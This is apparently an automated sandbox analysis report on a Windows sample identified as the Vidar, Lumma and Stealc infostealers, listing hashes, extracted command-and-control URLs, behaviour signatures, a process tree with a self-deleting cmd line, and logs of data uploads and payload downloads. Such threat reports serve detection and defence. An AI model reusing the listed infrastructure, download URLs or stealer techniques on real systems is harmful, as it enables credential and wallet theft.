Analysis

  • max time kernel
    93s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-09-2024 10:39

General

  • Target

    file.exe

  • Size

    404KB

  • MD5

    24ee596bc8112bf2fb1a2bb592de5f48

  • SHA1

    b68b950551a71f04e1ecdda894ce35b7702a18c2

  • SHA256

    605f0e1ad907d5585d5a3ad94244e5ee606e0a16ef99ae51b1557c8ccbaab901

  • SHA512

    e6f5dd23b0ca48e871a1193b1cf46b011aab00a051db109c64d8ac38176bbd2b176ddaefbd47df17cd59f76529ea4c997cb11edb2ff47fe5fd3a5f92b1edc512

  • SSDEEP

    12288:rX25ztpOkX88ZnbKnBVRYRzv3UcwtfDWXBcJ45G35UEO:TC6s889Yr0D3UcqWXBwWy5Ut

Malware Config

Extracted

Family

vidar

Version

11

Botnet

486564c74cdd6745c0139d65a01027e6

C2

https://t.me/jamsemlg

https://steamcommunity.com/profiles/76561199780418869

https://t.me/ae5ed

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Extracted

Family

lumma

Extracted

Family

vidar

Version

11

Botnet

a669a86f8433a1e88901711c0f772c97

C2

https://t.me/jamsemlg

https://steamcommunity.com/profiles/76561199780418869

https://t.me/ae5ed

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Extracted

Family

stealc

Botnet

default

C2

http://46.8.231.109

Attributes
  • url_path

    /c4754d4f680ead72.php

Extracted

Family

lumma

C2

https://possiwreeste.site/api

https://underlinemdsj.site/api

https://chaptermusu.store/api

Signatures

  • Detect Vidar Stealer 20 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Stealc

    Stealc is an infostealer written in C++.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 5 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5088
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
      • Checks computer location settings
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:532
      • C:\ProgramData\AAEHDAAKEH.exe
        "C:\ProgramData\AAEHDAAKEH.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4724
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1944
      • C:\ProgramData\CAKKKFBFID.exe
        "C:\ProgramData\CAKKKFBFID.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3064
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
            PID:400
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:2556
        • C:\ProgramData\HJDGCGDBGC.exe
          "C:\ProgramData\HJDGCGDBGC.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4024
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
              PID:3320
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              4⤵
                PID:3344
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                4⤵
                • Checks computer location settings
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:5040
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\AdminFCAAEBFHJJ.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4468
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\AdminFCAAEBFHJJ.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3596
                  • C:\Users\AdminFCAAEBFHJJ.exe
                    "C:\Users\AdminFCAAEBFHJJ.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    PID:1932
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:2660
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKEGHDGHCGHD" & exit
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4324
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 10
                4⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:3456

        Network

        • flag-us
          DNS
          t.me
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          t.me
          IN A
          Response
          t.me
          IN A
          149.154.167.99
        • flag-us
          DNS
          t.me
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          t.me
          IN A
        • flag-us
          DNS
          28.118.140.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          28.118.140.52.in-addr.arpa
          IN PTR
          Response
        • flag-nl
          GET
          https://t.me/jamsemlg
          RegAsm.exe
          Remote address:
          149.154.167.99:443
          Request
          GET /jamsemlg HTTP/1.1
          Host: t.me
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0
          Date: Mon, 30 Sep 2024 10:39:10 GMT
          Content-Type: text/html; charset=utf-8
          Content-Length: 12382
          Connection: keep-alive
          Set-Cookie: stel_ssid=a24a0cfbc4f6be6b71_11082954543017583655; expires=Tue, 01 Oct 2024 10:39:10 GMT; path=/; samesite=None; secure; HttpOnly
          Pragma: no-cache
          Cache-control: no-store
          X-Frame-Options: ALLOW-FROM https://web.telegram.org
          Content-Security-Policy: frame-ancestors https://web.telegram.org
          Strict-Transport-Security: max-age=35768000
        • flag-us
          DNS
          99.167.154.149.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          99.167.154.149.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          99.167.154.149.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          99.167.154.149.in-addr.arpa
          IN PTR
        • flag-us
          DNS
          urusvisa.com
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          urusvisa.com
          IN A
          Response
          urusvisa.com
          IN A
          5.42.101.62
        • flag-nl
          GET
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET / HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:11 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFC
          Host: urusvisa.com
          Content-Length: 256
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:11 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGC
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:12 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCG
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:13 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----GHIJJJEGDBFHDHJJDBAK
          Host: urusvisa.com
          Content-Length: 332
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:13 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----BKJJEBKKEHJDGCBGCFCG
          Host: urusvisa.com
          Content-Length: 4561
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:14 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          62.101.42.5.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          62.101.42.5.in-addr.arpa
          IN PTR
          Response
          62.101.42.5.in-addr.arpa
          IN PTR
          torpid-juiceaezanetwork
        • flag-us
          DNS
          22.160.190.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          22.160.190.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          95.221.229.192.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          95.221.229.192.in-addr.arpa
          IN PTR
          Response
        • flag-nl
          GET
          http://urusvisa.com/sql.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /sql.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:14 GMT
          Content-Type: application/octet-stream
          Content-Length: 2459136
          Last-Modified: Fri, 24 Nov 2023 13:43:06 GMT
          Connection: keep-alive
          ETag: "6560a86a-258600"
          Accept-Ranges: bytes
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
          Host: urusvisa.com
          Content-Length: 437
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:16 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----JDAFIEHIEGDHIDGDGHDH
          Host: urusvisa.com
          Content-Length: 437
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:16 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          GET
          http://urusvisa.com/freebl3.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /freebl3.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:17 GMT
          Content-Type: application/octet-stream
          Content-Length: 685392
          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
          Connection: keep-alive
          ETag: "6315a9f4-a7550"
          Accept-Ranges: bytes
        • flag-nl
          GET
          http://urusvisa.com/mozglue.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /mozglue.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:17 GMT
          Content-Type: application/octet-stream
          Content-Length: 608080
          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
          Connection: keep-alive
          ETag: "6315a9f4-94750"
          Accept-Ranges: bytes
        • flag-nl
          GET
          http://urusvisa.com/msvcp140.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /msvcp140.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:17 GMT
          Content-Type: application/octet-stream
          Content-Length: 450024
          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
          Connection: keep-alive
          ETag: "6315a9f4-6dde8"
          Accept-Ranges: bytes
        • flag-nl
          GET
          http://urusvisa.com/softokn3.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /softokn3.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:17 GMT
          Content-Type: application/octet-stream
          Content-Length: 257872
          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
          Connection: keep-alive
          ETag: "6315a9f4-3ef50"
          Accept-Ranges: bytes
        • flag-nl
          GET
          http://urusvisa.com/vcruntime140.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /vcruntime140.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:17 GMT
          Content-Type: application/octet-stream
          Content-Length: 80880
          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
          Connection: keep-alive
          ETag: "6315a9f4-13bf0"
          Accept-Ranges: bytes
        • flag-nl
          GET
          http://urusvisa.com/nss3.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /nss3.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:17 GMT
          Content-Type: application/octet-stream
          Content-Length: 2046288
          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
          Connection: keep-alive
          ETag: "6315a9f4-1f3950"
          Accept-Ranges: bytes
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFH
          Host: urusvisa.com
          Content-Length: 1025
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:18 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:19 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:19 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF
          Host: urusvisa.com
          Content-Length: 461
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:19 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGI
          Host: urusvisa.com
          Content-Length: 111897
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:21 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBA
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:21 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJ
          Host: urusvisa.com
          Content-Length: 499
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:24 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJ
          Host: urusvisa.com
          Content-Length: 499
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:25 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH
          Host: urusvisa.com
          Content-Length: 499
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCG
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          files.veritas.org.ng
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          files.veritas.org.ng
          IN A
          Response
          files.veritas.org.ng
          IN A
          147.45.44.104
        • flag-ch
          GET
          http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe
          RegAsm.exe
          Remote address:
          147.45.44.104:80
          Request
          GET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1
          Host: files.veritas.org.ng
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:22 GMT
          Content-Type: application/octet-stream
          Content-Length: 380456
          Last-Modified: Mon, 30 Sep 2024 04:37:24 GMT
          Connection: keep-alive
          Keep-Alive: timeout=120
          ETag: "66fa2b04-5ce28"
          X-Content-Type-Options: nosniff
          Accept-Ranges: bytes
        • flag-ch
          GET
          http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exe
          RegAsm.exe
          Remote address:
          147.45.44.104:80
          Request
          GET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1
          Host: files.veritas.org.ng
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:24 GMT
          Content-Type: application/octet-stream
          Content-Length: 414248
          Last-Modified: Mon, 30 Sep 2024 04:37:16 GMT
          Connection: keep-alive
          Keep-Alive: timeout=120
          ETag: "66fa2afc-65228"
          X-Content-Type-Options: nosniff
          Accept-Ranges: bytes
        • flag-ch
          GET
          http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exe
          RegAsm.exe
          Remote address:
          147.45.44.104:80
          Request
          GET /ldms/66fa2ae906657_snd.exe HTTP/1.1
          Host: files.veritas.org.ng
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:25 GMT
          Content-Type: application/octet-stream
          Content-Length: 334376
          Last-Modified: Mon, 30 Sep 2024 04:36:57 GMT
          Connection: keep-alive
          Keep-Alive: timeout=120
          ETag: "66fa2ae9-51a28"
          X-Content-Type-Options: nosniff
          Accept-Ranges: bytes
        • flag-us
          DNS
          58.55.71.13.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          58.55.71.13.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          104.44.45.147.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          104.44.45.147.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          possiwreeste.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          possiwreeste.site
          IN A
          Response
          possiwreeste.site
          IN A
          172.67.205.129
          possiwreeste.site
          IN A
          104.21.22.157
        • flag-us
          POST
          https://possiwreeste.site/api
          RegAsm.exe
          Remote address:
          172.67.205.129:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: possiwreeste.site
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:24 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=kfsmsvtfbo4ddsrv68h8jsuus3; expires=Fri, 24 Jan 2025 04:26:03 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gprBReNzpUvXF4Ljc59GFxYcQjhDWZLiq%2BWBtlhvIWNLu9MsMx3dGWsvw%2F%2BrZ1qidq7hKEK2mzypLVXCYNu5BL5rsnLPxvmPj06RmVcmsCzd1H1oC6f88%2FoDBaywaQJr7GjiPA%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb396bfff244195-LHR
        • flag-us
          POST
          https://possiwreeste.site/api
          RegAsm.exe
          Remote address:
          172.67.205.129:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: possiwreeste.site
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:24 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=os5fvp126m8v2drtq2gr0t6eql; expires=Fri, 24 Jan 2025 04:26:03 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DjFLnnTG3DTDAnnH%2FXOssK8fjoF2lBiDmizr4A8nRBWYT%2FM5vNaUBMW1mM8RdHcFPHSyLAXvmy3TmmC%2BhVtV4H5hEZDsRDd7gAyT3n16dOmlX4lW81rK2zAaPWuqEag0fOZ5Uw%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb396c1fa734195-LHR
        • flag-us
          DNS
          famikyjdiag.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          famikyjdiag.site
          IN A
          Response
        • flag-us
          DNS
          commandejorsk.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          commandejorsk.site
          IN A
          Response
        • flag-us
          DNS
          underlinemdsj.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          underlinemdsj.site
          IN A
          Response
          underlinemdsj.site
          IN A
          104.21.1.169
          underlinemdsj.site
          IN A
          172.67.129.166
        • flag-us
          POST
          https://underlinemdsj.site/api
          RegAsm.exe
          Remote address:
          104.21.1.169:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: underlinemdsj.site
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:25 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=pcssp65funvvv1d5fpll6srl0d; expires=Fri, 24 Jan 2025 04:26:04 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
